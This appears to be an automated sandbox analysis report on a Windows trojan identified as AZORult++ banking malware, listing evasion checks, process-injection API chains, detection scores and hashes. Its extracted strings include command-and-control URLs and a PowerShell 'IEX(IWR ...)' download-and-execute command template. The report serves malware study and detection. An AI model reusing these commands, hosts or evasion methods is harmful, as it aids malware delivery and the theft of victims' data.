ameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,		0_2_005A8610

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

0_2_005A6690

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	String found in binary or memory: http://195.123.217.199/aahs.php
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027937445.000000000069E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.123.217.199/aahs.php%temp%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	String found in binary or memory: https://xpradiotwo.com/wp-content/uploads
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027937445.000000000069E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: https://xpradiotwo.com/wp-content/uploads/c

E-Banking Fraud

Detected AZORult++ Trojan

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_005A8DC0 EntryPoint,GetUserDefaultLangID,ExitProcess,

0_2_005A8DC0

Contains functionality to call native functions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A5E60 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,		0_2_005A5E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A5AE0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,		0_2_005A5AE0

Detected potential crypto function

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FBE87D	0_2_00FBE87D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A7850	0_2_005A7850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A7430	0_2_005A7430
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A2490	0_2_005A2490
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A4250	0_2_005A4250
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A4650	0_2_005A4650

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: String function: 00FB4480 appears 33 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: String function: 00FB3040 appears 46 times

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal88.bank.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_005A6200 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,

0_2_005A6200

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_005A6AC0 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,

0_2_005A6AC0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Command line argument: jhl46745fghb

0_2_00FB2F40

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	ReversingLabs: Detection: 83%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Virustotal: Detection: 80%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: sspicli.dll	Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FB1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00FB1300

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe

0_2_005A8610

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

0_2_005A8610

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

File opened / queried: C:\Windows\System32\VBoxService.exe

Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

API coverage: 9.6 %

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB8ACD FindFirstFileExW,		0_2_00FB8ACD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A8610 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,		0_2_005A8610

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Binary or memory string: Hyper-V
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Binary or memory string: VMWare
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: POST%s\|%s\|VoYGkc5RStart%d\|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://195.123.217.199/aahs.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://xpradiotwo.com/wp-content/uploads/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Binary or memory string: %systemroot%\System32\VBoxTray.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	API call chain: ExitProcess graph end node

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FB695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00FB695B

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FB1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00FB1300

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB1710 mov ecx, dword ptr fs:[00000030h]	0_2_00FB1710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB75A2 mov eax, dword ptr fs:[00000030h]	0_2_00FB75A2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB9763 mov eax, dword ptr fs:[00000030h]	0_2_00FB9763
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A7640 mov eax, dword ptr fs:[00000030h]	0_2_005A7640
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A5E60 mov eax, dword ptr fs:[00000030h]	0_2_005A5E60

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FBA845 GetProcessHeap,

0_2_00FBA845

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FB695B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB3D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00FB3D4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FB421C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB43AF SetUnhandledExceptionFilter,	0_2_00FB43AF

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

0_2_005A5AE0

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FB44C5 cpuid

0_2_00FB44C5

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FB4103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00FB4103

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

0_2_005A8610

ID:	1426755
Product:	CloudBasic
Start time:	15:27:20
Start date:	16.04.2024
Sample:	SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	69b4504419872fee9bc3bc996b88eb4b
SHA1:	f87cd6cc91070bb3331fe6c6e25ac84b840f0c50
SHA256:	0a06c8a177765ec2e723da7b9d406eb68c43541a6740ffa395a7297ed94e0d73
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Windows Analysis Report SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe